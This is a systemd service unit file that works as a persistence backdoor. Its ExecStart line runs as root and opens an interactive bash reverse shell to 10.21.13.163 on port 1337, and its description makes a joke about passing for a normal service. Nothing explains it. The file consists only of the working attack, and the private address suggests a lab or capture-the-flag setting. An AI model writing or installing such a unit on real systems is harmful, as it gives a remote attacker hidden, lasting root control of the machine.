[Unit]
Description=This is not the evil service you are looking for...

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.21.13.163/1337 0>&1'

[Install]
WantedBy=multi-user.target